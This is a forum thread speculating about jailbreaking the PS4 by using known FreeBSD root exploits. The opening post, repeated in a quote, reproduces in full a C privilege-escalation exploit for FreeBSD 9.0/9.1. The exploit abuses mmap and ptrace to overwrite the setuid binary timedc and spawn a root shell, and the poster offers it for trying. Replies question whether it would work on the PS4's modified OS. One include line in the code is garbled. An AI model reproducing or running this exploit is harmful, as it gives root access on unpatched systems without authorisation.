PS4 About the jailbreak

(Yeah my English sucks)
I was thinking today, PS4 is running in Fork of FreeBSD.
Everyone is trying to think how to jailbreak PS4 how about taking Kali Linux and using some of the ROOT exploits what are known?
There is alot of them about FreeBSD. Yeah some of them may brick ur PS4. But i think there is chance. A chance u could make use of exploit and run unsinged code in PS4 example: FreeBSD 9.0-9.1 mmap/ptrace - Privilege Escalation Exploit (Copied from exploit(Dot)db)

Spoiler

/*
* FreeBSD 9.{0,1} mmap/ptrace exploit
* by Hunger <fbsd9lul@hunger.hu>
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago...

*
* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
* sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
* I hope we'll meet again at 8@1470n

*
* Special thanks to proactivesec.com
*
*/

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys

pes.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"

int
main(int ac, char **av) {
int from_fd, to_fd, status;
struct stat st;
struct ptrace_io_desc piod;
char *s, *d;
pid_t pid;

if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}

printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
printf("by Hunger <fbsd9lul@hunger.hu>\n");

if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
(to_fd = open(TG, O_RDONLY)) == -1)
err(1, "open");

if (stat(av[0], &st) == -1)
err(2, "stat");

if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
(d = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
err(3, "mmap");

if ((pid = fork()) == -1)
err(4, "fork");

if (!pid) {
if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
err(5, "ptraceme");

return 0;
}

if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
err(6, "ptattach");

if (wait(&status) == -1)
err(7, "wait");

piod.piod_op = PIOD_WRITE_D;
piod.piod_offs = d;
piod.piod_addr = s;
piod.piod_len = st.st_size;

if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
err(8, "ptio");

execl(TG, TG, NULL);

return 0;
}

I think im going to try this. Normally most noobish stuff will work... LIKE MAKE A FKING AUTORUN USB AND TRY IT ;d
Idk what u guys think about this?

Originally Posted by rainbowcoke

(Yeah my English sucks)
I was thinking today, PS4 is running in Fork of FreeBSD.
Everyone is trying to think how to jailbreak PS4 how about taking Kali Linux and using some of the ROOT exploits what are known?
There is alot of them about FreeBSD. Yeah some of them may brick ur PS4. But i think there is chance. A chance u could make use of exploit and run unsinged code in PS4 example: FreeBSD 9.0-9.1 mmap/ptrace - Privilege Escalation Exploit (Copied from exploit(Dot)db)

Spoiler

/*
* FreeBSD 9.{0,1} mmap/ptrace exploit
* by Hunger <fbsd9lul@hunger.hu>
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago...

*
* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
* sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
* I hope we'll meet again at 8@1470n

*
* Special thanks to proactivesec.com
*
*/

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys

pes.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"

int
main(int ac, char **av) {
int from_fd, to_fd, status;
struct stat st;
struct ptrace_io_desc piod;
char *s, *d;
pid_t pid;

if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}

printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
printf("by Hunger <fbsd9lul@hunger.hu>\n");

if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
(to_fd = open(TG, O_RDONLY)) == -1)
err(1, "open");

if (stat(av[0], &st) == -1)
err(2, "stat");

if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
(d = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
err(3, "mmap");

if ((pid = fork()) == -1)
err(4, "fork");

if (!pid) {
if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
err(5, "ptraceme");

return 0;
}

if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
err(6, "ptattach");

if (wait(&status) == -1)
err(7, "wait");

piod.piod_op = PIOD_WRITE_D;
piod.piod_offs = d;
piod.piod_addr = s;
piod.piod_len = st.st_size;

if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
err(8, "ptio");

execl(TG, TG, NULL);

return 0;
}

I think im going to try this. Normally most noobish stuff will work... LIKE MAKE A FKING AUTORUN USB AND TRY IT ;d
Idk what u guys think about this?

I personally do not think it is that simple.

Sure the PS4 runs off FreeBSD but it's so heavily modified it would almost be non existent which is why it's called OrbisOS instead of FreeBSD.

Another thing to note is that Sony learned a very heavy lesson with the PS3 and security issues that surrounded that. It's safe to assume that they've locked down the PS4 pretty well this time around.

Originally Posted by Justin

I personally do not think it is that simple.

Sure the PS4 runs off FreeBSD but it's so heavily modified it would almost be non existent which is why it's called OrbisOS instead of FreeBSD.

Another thing to note is that Sony learned a very heavy lesson with the PS3 and security issues that surrounded that. It's safe to assume that they've locked down the PS4 pretty well this time around.

Yes yes. You are very true. But everthing has exploits. Even a fking car...

PS4 About the jailbreak

Post a Reply

Similar Threads

Tags for this Thread

PS4 About the jailbreak

Post a Reply

Similar Threads

Tags for this Thread